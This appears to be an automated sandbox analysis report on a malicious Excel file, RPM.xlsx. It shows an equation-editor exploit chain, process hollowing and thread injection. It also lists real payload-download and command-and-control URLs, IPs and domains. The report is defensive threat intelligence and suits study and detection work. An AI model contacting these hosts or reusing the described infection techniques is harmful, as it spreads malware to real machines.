  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491441 Sample: RPM.xlsx Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 39 www.dermaqueeniran.com 2->39 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 15 other signatures 2->59 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 33 24 2->16         started        signatures3 process4 dnsIp5 47 23.95.13.176, 49167, 80 AS-COLOCROSSINGUS United States 11->47 33 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->79 18 vbc.exe 1 5 11->18         started        37 C:\Users\user\Desktop\~$RPM.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Tries to detect virtualization through RDTSC time measurements 18->49 51 Injects a PE file into a foreign processes 18->51 21 vbc.exe 18->21         started        process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 21->61 63 Maps a DLL or memory area into another process 21->63 65 Sample uses process hollowing technique 21->65 67 Queues an APC in another process (thread injection) 21->67 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.meta-bot.xyz 24->41 43 www.floridawp.com 107.187.86.150, 49169, 80 EGIHOSTINGUS United States 24->43 45 4 other IPs or domains 24->45 69 System process connects to network (likely due to code injection or exploit) 24->69 71 Performs DNS queries to domains with low reputation 24->71 28 svchost.exe 24->28         started        signatures14 process15 signatures16 73 Modifies the context of a thread in another process (thread injection) 28->73 75 Maps a DLL or memory area into another process 28->75 77 Tries to detect virtualization through RDTSC time measurements 28->77 31 cmd.exe 28->31         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
204.141.43.204
 zhs.zohosites.com United States
2639 ZOHO-ASUS false
23.95.13.176
 unknown United States
36352 AS-COLOCROSSINGUS true
203.170.129.2
 www.meta-bot.xyz Thailand
9891 CSLOX-IDC-AS-APCSLOXINFOPublicCompanyLimitedTH true
107.187.86.150
 www.floridawp.com United States
18779 EGIHOSTINGUS true
209.17.116.163
 www.viscoent.online United States
55002 DEFENSE-NETUS true

Contacted Domains

Name IP Active
zhs.zohosites.com 204.141.43.204 true
www.floridawp.com 107.187.86.150 true
www.viscoent.online 209.17.116.163 true
www.meta-bot.xyz 203.170.129.2 true
www.dermaqueeniran.com unknown unknown
www.atelifer.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.meta-bot.xyz/scb0/?Fd=BfSM6E5FO5mfZBpeeQrV1vQh+D95EOiFfI1FDjk8ynIPzfiNz31eNoHs9fDCzXb1/NDphw==&w6AxuD=NpI8gJ true
  • Avira URL Cloud: safe
 unknown
www.vetpipes.com/scb0/ true
  • Avira URL Cloud: safe
 low
http://23.95.13.176/rpm/vbc.exe true
  • Avira URL Cloud: safe
 unknown
http://www.atelifer.com/scb0/?Fd=mwRuPibKyw2L8cALxBov5M1LiNVIxoe3TesDkz/iiiM8SziCnVEVET/qb0i1hxI+nmTWCA==&w6AxuD=NpI8gJ true
  • Avira URL Cloud: safe
 unknown
http://www.floridawp.com/scb0/?Fd=9/BqtxNO8SZEigUgjw/jJ2i6+zR3ejBZmh2LifaRE3cbasx521HSBMlSKzI9uLCsk85EYQ==&w6AxuD=NpI8gJ true
  • Avira URL Cloud: safe
 unknown
http://www.viscoent.online/scb0/?Fd=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&w6AxuD=NpI8gJ true
  • Avira URL Cloud: safe
 unknown